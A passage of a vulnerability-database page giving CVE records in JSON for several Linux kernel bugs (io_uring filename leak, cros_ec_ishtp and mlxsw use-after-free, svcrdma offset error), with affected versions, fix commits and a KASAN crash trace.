Affected: b9445598d8c60a1379887b957024b71343965f74 , < 8f44c4a550570cd5903625133f938c6b51310c9b (git) Affected: b9445598d8c60a1379887b957024b71343965f74 , < 18b99fa603d0df5e1c898699c17d3b92ddc80746 (git) Affected: b9445598d8c60a1379887b957024b71343965f74 , < e232269d511566b1f80872256a48593acc1becf4 (git) Affected: b9445598d8c60a1379887b957024b71343965f74 , < 7fbfb85b05bc960cc50e09d03e5e562131e48d45 (git) Affected: b9445598d8c60a1379887b957024b71343965f74 , < b14fad555302a2104948feaff70503b64c80ac01 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"io_uring/openclose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2420ef01b2e836fbc05a0a8c73a1016504eb0458",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "8f44c4a550570cd5903625133f938c6b51310c9b",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "18b99fa603d0df5e1c898699c17d3b92ddc80746",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "e232269d511566b1f80872256a48593acc1becf4",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "7fbfb85b05bc960cc50e09d03e5e562131e48d45",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
},
{
"lessThan": "b14fad555302a2104948feaff70503b64c80ac01",
"status": "affected",
"version": "b9445598d8c60a1379887b957024b71343965f74",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"io_uring/openclose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:19.051Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2420ef01b2e836fbc05a0a8c73a1016504eb0458"
},
{
"url": "https://git.kernel.org/stable/c/8f44c4a550570cd5903625133f938c6b51310c9b"
},
{
"url": "https://git.kernel.org/stable/c/18b99fa603d0df5e1c898699c17d3b92ddc80746"
},
{
"url": "https://git.kernel.org/stable/c/e232269d511566b1f80872256a48593acc1becf4"
},
{
"url": "https://git.kernel.org/stable/c/7fbfb85b05bc960cc50e09d03e5e562131e48d45"
},
{
"url": "https://git.kernel.org/stable/c/b14fad555302a2104948feaff70503b64c80ac01"
}
],
"title": "io_uring: fix filename leak in __io_openat_prep()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68814",
"datePublished": "2026-01-13T15:29:19.129Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:19.051Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68804 (GCVE-0-2025-68804)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver
Summary
In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver
After unbinding the driver, another kthread `cros_ec_console_log_work`
is still accessing the device, resulting an UAF and crash.
The driver doesn't unregister the EC device in .remove() which should
shutdown sub-devices synchronously. Fix it.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
26a14267aff218c60b89007fdb44ca392ba6122c , < 27037916db38e6b78a0242031d3b93d997b84020
(git)
Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < e1da6e399df976dd04c7c73ec008bc81da368a95 (git) Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 8dc1f5a85286290dbf04dd5951d020570f49779b (git) Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 393b8f9bedc7806acb9c47cefdbdb223b4b6164b (git) Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 4701493ba37654b3c38b526f6591cf0b02aa172f (git) Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 24a2062257bbdfc831de5ed21c27b04b5bdf2437 (git) Affected: 26a14267aff218c60b89007fdb44ca392ba6122c , < 944edca81e7aea15f83cf9a13a6ab67f711e8abd (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/chrome/cros_ec_ishtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "27037916db38e6b78a0242031d3b93d997b84020",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "e1da6e399df976dd04c7c73ec008bc81da368a95",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "8dc1f5a85286290dbf04dd5951d020570f49779b",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "393b8f9bedc7806acb9c47cefdbdb223b4b6164b",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "4701493ba37654b3c38b526f6591cf0b02aa172f",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "24a2062257bbdfc831de5ed21c27b04b5bdf2437",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
},
{
"lessThan": "944edca81e7aea15f83cf9a13a6ab67f711e8abd",
"status": "affected",
"version": "26a14267aff218c60b89007fdb44ca392ba6122c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/chrome/cros_ec_ishtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:15.580Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/27037916db38e6b78a0242031d3b93d997b84020"
},
{
"url": "https://git.kernel.org/stable/c/e1da6e399df976dd04c7c73ec008bc81da368a95"
},
{
"url": "https://git.kernel.org/stable/c/8dc1f5a85286290dbf04dd5951d020570f49779b"
},
{
"url": "https://git.kernel.org/stable/c/393b8f9bedc7806acb9c47cefdbdb223b4b6164b"
},
{
"url": "https://git.kernel.org/stable/c/4701493ba37654b3c38b526f6591cf0b02aa172f"
},
{
"url": "https://git.kernel.org/stable/c/24a2062257bbdfc831de5ed21c27b04b5bdf2437"
},
{
"url": "https://git.kernel.org/stable/c/944edca81e7aea15f83cf9a13a6ab67f711e8abd"
}
],
"title": "platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68804",
"datePublished": "2026-01-13T15:29:12.418Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:15.580Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68811 (GCVE-0-2025-68811)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
svcrdma: use rc_pageoff for memcpy byte offset
Summary
In the Linux kernel, the following vulnerability has been resolved:
svcrdma: use rc_pageoff for memcpy byte offset
svc_rdma_copy_inline_range added rc_curpage (page index) to the page
base instead of the byte offset rc_pageoff. Use rc_pageoff so copies
land within the current page.
Found by ZeroPath (https://zeropath.com)
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < e8623e9c451e23d84b870811f42fd872b4089ef6
(git)
Affected: 8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < 2a77c8dd49bccf0ca232be7c836cec1209abb8da (git) Affected: 8e122582680c6f8acd686a5a2af9c0e46fe90f2d , < a8ee9099f30654917aa68f55d707b5627e1dbf77 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e8623e9c451e23d84b870811f42fd872b4089ef6",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
},
{
"lessThan": "2a77c8dd49bccf0ca232be7c836cec1209abb8da",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
},
{
"lessThan": "a8ee9099f30654917aa68f55d707b5627e1dbf77",
"status": "affected",
"version": "8e122582680c6f8acd686a5a2af9c0e46fe90f2d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:17.128Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e8623e9c451e23d84b870811f42fd872b4089ef6"
},
{
"url": "https://git.kernel.org/stable/c/2a77c8dd49bccf0ca232be7c836cec1209abb8da"
},
{
"url": "https://git.kernel.org/stable/c/a8ee9099f30654917aa68f55d707b5627e1dbf77"
}
],
"title": "svcrdma: use rc_pageoff for memcpy byte offset",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68811",
"datePublished": "2026-01-13T15:29:17.128Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:17.128Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68801 (GCVE-0-2025-68801)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
mlxsw: spectrum_router: Fix neighbour use-after-free
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_router: Fix neighbour use-after-free
We sometimes observe use-after-free when dereferencing a neighbour [1].
The problem seems to be that the driver stores a pointer to the
neighbour, but without holding a reference on it. A reference is only
taken when the neighbour is used by a nexthop.
Fix by simplifying the reference counting scheme. Always take a
reference when storing a neighbour pointer in a neighbour entry. Avoid
taking a referencing when the neighbour is used by a nexthop as the
neighbour entry associated with the nexthop already holds a reference.
Tested by running the test that uncovered the problem over 300 times.
Without this patch the problem was reproduced after a handful of
iterations.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310
Read of size 8 at addr ffff88817f8e3420 by task ip/3929
CPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)
Hardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023
Call Trace:
<TASK>
dump_stack_lvl+0x6f/0xa0
print_address_description.constprop.0+0x6e/0x300
print_report+0xfc/0x1fb
kasan_report+0xe4/0x110
mlxsw_sp_neigh_entry_update+0x2d4/0x310
mlxsw_sp_router_rif_gone_sync+0x35f/0x510
mlxsw_sp_rif_destroy+0x1ea/0x730
mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0
__mlxsw_sp_inetaddr_lag_event+0xcc/0x130
__mlxsw_sp_inetaddr_event+0xf5/0x3c0
mlxsw_sp_router_netdevice_event+0x1015/0x1580
notifier_call_chain+0xcc/0x150
call_netdevice_notifiers_info+0x7e/0x100
__netdev_upper_dev_unlink+0x10b/0x210
netdev_upper_dev_unlink+0x79/0xa0
vrf_del_slave+0x18/0x50
do_set_master+0x146/0x7d0
do_setlink.isra.0+0x9a0/0x2880
rtnl_newlink+0x637/0xb20
rtnetlink_rcv_msg+0x6fe/0xb90
netlink_rcv_skb+0x123/0x380
netlink_unicast+0x4a3/0x770
netlink_sendmsg+0x75b/0xc90
__sock_sendmsg+0xbe/0x160
____sys_sendmsg+0x5b2/0x7d0
___sys_sendmsg+0xfd/0x180
__sys_sendmsg+0x124/0x1c0
do_syscall_64+0xbb/0xfd0
entry_SYSCALL_64_after_hwframe+0x4b/0x53
[...]
Allocated by task 109:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x7b/0x90
__kmalloc_noprof+0x2c1/0x790
neigh_alloc+0x6af/0x8f0
___neigh_create+0x63/0xe90
mlxsw_sp_nexthop_neigh_init+0x430/0x7e0
mlxsw_sp_nexthop_type_init+0x212/0x960
mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280
mlxsw_sp_nexthop6_group_get+0x392/0x6a0
mlxsw_sp_fib6_entry_create+0x46a/0xfd0
mlxsw_sp_router_fib6_replace+0x1ed/0x5f0
mlxsw_sp_router_fib6_event_work+0x10a/0x2a0
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Freed by task 154:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_save_free_info+0x3b/0x60
__kasan_slab_free+0x43/0x70
kmem_cache_free_bulk.part.0+0x1eb/0x5e0
kvfree_rcu_bulk+0x1f2/0x260
kfree_rcu_work+0x130/0x1b0
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Last potentially related work creation:
kasan_save_stack+0x30/0x50
kasan_record_aux_stack+0x8c/0xa0
kvfree_call_rcu+0x93/0x5b0
mlxsw_sp_router_neigh_event_work+0x67d/0x860
process_one_work+0xd57/0x1390
worker_thread+0x4d6/0xd40
kthread+0x355/0x5b0
ret_from_fork+0x1d4/0x270
ret_from_fork_asm+0x11/0x20
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
6cf3c971dc84cb36579515ddb488919b9e9fb6de , < a2dfe6758fc63e542105bee8b17a3a7485684db0
(git)
Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc (git) Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < c437fbfd4382412598cdda1f8e2881b523668cc2 (git) Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 4a3c569005f42ab5e5b2ad637132a33bf102cc08 (git) Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a (git) Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 675c5aeadf6472672c472dc0f26401e4fcfbf254 (git) Affected: 6cf3c971dc84cb36579515ddb488919b9e9fb6de , < 8b0e69763ef948fb872a7767df4be665d18f5fd4 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a2dfe6758fc63e542105bee8b17a3a7485684db0",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "c437fbfd4382412598cdda1f8e2881b523668cc2",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "4a3c569005f42ab5e5b2ad637132a33bf102cc08",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "675c5aeadf6472672c472dc0f26401e4fcfbf254",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
},
{
"lessThan": "8b0e69763ef948fb872a7767df4be665d18f5fd4",
"status": "affected",
"version": "6cf3c971dc84cb36579515ddb488919b9e9fb6de",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n 